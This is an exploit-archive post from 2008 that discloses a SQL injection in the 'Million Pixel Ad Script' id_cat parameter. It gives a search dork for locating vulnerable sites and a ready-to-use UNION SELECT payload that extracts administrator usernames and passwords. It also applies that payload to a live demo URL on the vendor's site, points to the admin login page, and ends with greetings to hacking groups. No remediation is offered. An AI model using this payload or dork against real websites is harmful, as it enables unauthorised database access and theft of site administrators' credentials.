Home / exploits millionpixel-sql.txt
Posted on 25 August 2008
|___________________________________________________| | | Million Pixel Ad Script (id_cat) Remote SQL Injection Vulnerability | |___________________________________________________ |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : WwW.Hussin-X.com | www.tryag.cc | | email: darkangel_g85[at]Yahoo[DoT]com | | |___________________________________________________ | | | | script :http://www.script66.com/Milion-Pixel-Ad-Script/ | | DorK : Powered by: Script66.com Or inurl:tops_top.php?id_cat= |___________________________________________________| Exploit: ________ www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/null,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins-- L!VE DEMO: _________ http://www.script66.com/demo/thepixelscript/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/null,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins-- ____________ Admin Login : www.[target].com/Script/admin/ ____________ ____________________________( Greetz )_________________________________ | | All members of the Forum WwW.hussin-x.CoM | WwW.TrYaG.CC | | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe | | jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker |______________________________________________________________________ Im IRAQi
